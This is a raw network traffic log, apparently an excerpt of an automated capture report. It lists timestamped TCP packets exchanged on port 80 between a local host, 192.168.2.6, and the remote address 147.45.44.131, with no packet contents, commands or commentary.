                                                                          Jan 7, 2025 06:12:05.688169003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688178062 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688184023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688194990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688213110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688220978 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688225031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688235998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688240051 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688265085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688271046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688287973 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688298941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688308954 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688309908 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688319921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688340902 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688369036 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688525915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688543081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688554049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688564062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688575029 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688584089 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688584089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688596010 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688596964 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688608885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688620090 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688626051 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688631058 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688641071 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688643932 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688676119 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688744068 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688755989 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688766003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688776970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688786030 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688788891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688798904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688810110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.688817024 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.688851118 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.728017092 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728045940 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728056908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728066921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728077888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728087902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728099108 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.728099108 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.728128910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782151937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782210112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782219887 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782224894 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782231092 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782243013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782252073 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782262087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782272100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782282114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782288074 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782299995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782304049 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782319069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782354116 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782428026 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782442093 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782450914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782460928 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782469988 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782473087 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782480955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782490015 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782502890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782502890 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782519102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782531023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782540083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782545090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782551050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782561064 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782565117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782576084 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782582998 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782589912 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782602072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782612085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782617092 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782625914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782648087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782649040 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782670975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782672882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782711983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782721996 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782727957 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782732010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782754898 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782795906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782807112 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782815933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782833099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782838106 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782857895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782860994 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782869101 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782885075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782893896 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782917023 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.782977104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782987118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.782996893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783021927 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783062935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783078909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783088923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783098936 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783104897 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783108950 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783119917 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783127069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783137083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783144951 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783154011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783164978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783175945 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783179045 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783191919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783200026 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783204079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783215046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783222914 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783226013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783246994 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783320904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783332109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783344984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783364058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783380985 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783533096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783545017 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783554077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783564091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783574104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783575058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783584118 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783596039 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783596992 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783606052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783617020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783620119 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783627033 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783637047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783647060 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783651114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783662081 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783669949 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783670902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783684969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783690929 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783700943 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783710003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783711910 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783723116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783735037 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783739090 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783749104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783757925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783766985 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783776999 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783886909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783898115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783907890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783922911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783931017 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783931971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783943892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783951044 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783955097 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783966064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783972979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.783976078 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783996105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.783998966 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784012079 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784034014 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784044981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784054995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784075975 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784084082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784095049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784097910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784105062 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784126997 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784310102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784321070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784331083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784342051 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784352064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784353971 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784363031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784373999 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784375906 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784384012 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784415960 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784452915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784463882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784473896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784482956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784493923 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784496069 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.784509897 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784519911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.784538031 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.822308064 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822318077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822324038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822329044 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822339058 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822349072 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822359085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822370052 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.822401047 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822406054 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.822412968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.822451115 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874556065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874567986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874581099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874586105 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874596119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874607086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874655008 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874660969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874672890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874682903 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874690056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874716043 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874742031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874757051 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874767065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874778032 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874788046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874788046 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874804020 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874805927 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874816895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874825954 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874828100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874850035 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874876022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874886990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874897003 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874908924 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874933004 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.874933958 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874947071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874958038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.874979973 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875042915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875055075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875066042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875089884 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875097990 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875109911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875111103 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875121117 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875130892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875135899 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875168085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875195980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875207901 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875217915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875245094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875251055 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875257015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875264883 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875267982 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875296116 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875305891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875320911 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875324011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875339031 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875371933 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875382900 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875392914 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875403881 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875410080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875441074 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875475883 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875487089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875499010 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875519037 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875534058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875546932 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875556946 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875567913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875579119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875586987 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875590086 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875612974 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875652075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875663042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875673056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875691891 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875711918 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875745058 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875756979 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875771999 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875782013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875792027 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875812054 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875857115 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875868082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875878096 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875889063 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875895977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875900030 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875910997 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875921965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875929117 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875950098 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875961065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.875962019 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.875986099 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.876013041 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.876027107 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.876046896 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:05.876065969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:05.876075983 CET8049712147.45.44.131192.168.2.6
